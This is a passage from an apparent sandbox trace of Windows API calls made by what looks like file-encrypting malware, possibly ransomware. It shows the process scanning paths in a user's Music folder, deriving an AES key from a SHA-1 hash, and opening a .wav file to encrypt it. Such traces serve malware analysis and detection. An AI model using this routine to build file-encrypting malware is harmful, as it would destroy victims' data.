lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.626] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.626] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0182.626] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.626] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.626] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.626] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.626] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.626] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0xfe7dc3e0, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 0x90ae18 [0182.627] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0182.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.627] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.627] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.627] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.627] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0182.627] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.627] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0182.627] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.628] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0182.628] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.628] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.628] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.628] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.628] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0182.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.628] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0182.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.629] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0182.629] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.629] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.629] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.630] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.630] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.630] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0182.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.630] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.630] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.630] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.630] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.631] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.631] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.631] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.631] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.631] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.631] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.631] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0182.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.632] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0182.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.632] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.632] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.632] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.638] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.638] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.638] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.638] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.638] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.639] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0182.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.639] CryptDestroyHash (hHash=0x90af58) returned 1 [0182.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\7ihrod3g.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.641] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.641] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0182.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0182.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0182.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0182.642] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0182.642] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0182.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.642] HeapFree (in: 